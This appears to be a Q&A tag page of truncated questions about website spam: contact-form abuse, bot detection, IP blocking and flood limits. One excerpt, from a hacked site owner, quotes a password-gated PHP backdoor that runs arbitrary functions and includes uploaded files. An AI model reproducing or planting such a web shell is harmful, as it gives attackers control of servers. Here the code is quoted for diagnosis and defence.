spam

I have built a website and I want to have an e-mail contact form on the web page, so that someone can send me a message. I am using the code from this website: http://www.w3schools.com/php/php_secure_mail.asp I am using the part that says PHP Stopping E-mail Injections Even though my site gets very few hits per day (like less than 10 visitors) I am finding that I am getting 3 or 4 messages every day from "spammers" who just seem to be sending me random messages that are not related to the subject matter of the website. I am fairly new to all this, so I would like to ask the question: Why is my

How to distinguish robots from normal user? How does SO do this job? Currently I'm met with a robot which post once every 1 hour... Try akismet as your first line of defense. Bad Behaviour is efficient too, perhaps too efficient, as i had issues with false positives. Akismet on the other hand serves me well. Then, if necessary, add other layers not impeding on the user experience, (like using empty fields that should remain empty) and then if you really have to, other techniques involving turing test of some sorts (captcha being the worst in terms of user friendliness: try simple questions

Hi we have just noticed a bunch of Nigerian spam accounts in our email system. Now, we do have a reCaptcha in the signup form but apparently they circumvent it, manually or otherwise. It seems like a semi-manual circumvention since the accounts aren't created in bulk but instead as a steady stream with a few minutes in between. Since most of the spam accounts were created by IP addresses from Nigeria, we have just set up some simple IP filters over a couple of pretty broad IP ranges and that seems to be working for now. However we would like to make a more permanent solution to this problem.

Closed. This question is off-topic. It is not currently accepting answers. Learn more . Want to improve this question? Update the question so it's on-topic for Stack Overflow. I am looking for a way to drop connections from known spam ip addresses on an Amazon's Elastic Load Balancer (ELB)? I am currently doing this at the web server level (multiple instances, running behind the ELB), but wondering if there is a way to do it at the ELB. This way, I can avoid configuring each web server instance for this. I typically pull the Drop List from Spamhause.org every day and update my web server

I was hacked, and apparently they were sending spam emails. There were two files that they injected into my server (that were duplicated across all sub-directories). One is a heavily hashed PHP file that may be the sender. The code below is from the other file. Here's my question -- What is this accomplishing? I can't translate its purpose. Also, what should I do to avoid allowing this to happen again? <?php if(@md5($_POST['pass'])!=='692e3f52ee6f16bc78fa6e1ec4bd4a6a') die(); @extract($_POST); if(!empty($a)) @$a($b); if(!empty($_FILES['tmp_name'])) @include($_FILES['tmp_name']); ?> rename the

I am an amateur web designer, I have searched on stackoverflow.com and other websites and have found many fixes for this issue I'm having, but none of them have worked (probably because I implement them incorrectly). I'm hoping someone with more knowledge can help me with a simple fix or show me how to implement one of the fixes I've found. The problem: I have a very simple php contact form on my business's website. It has worked great for years, but in the last week has been hacked. I now receive hundreds of contact form submissions a day with no comments, they only have (apparently valid)

I'm actually working on a PHP project that will feature a user system (Login,Register,Send lost password to email,..) and I think that this may be very vulnerable to Brute-Force attacks and/or Spam (Send a password to someone's email like 1000 times, etc. use your fantasy) . Do today's webservers (Apache, IIS) have some sort of built-in defense against Brute-Force? What would be the best way to implement an Anti-Spam/Flood system, if I e.g.: want a page not be able to be called more than two times a minute, however another page may be called up to 100 times a minute or so. I would definitely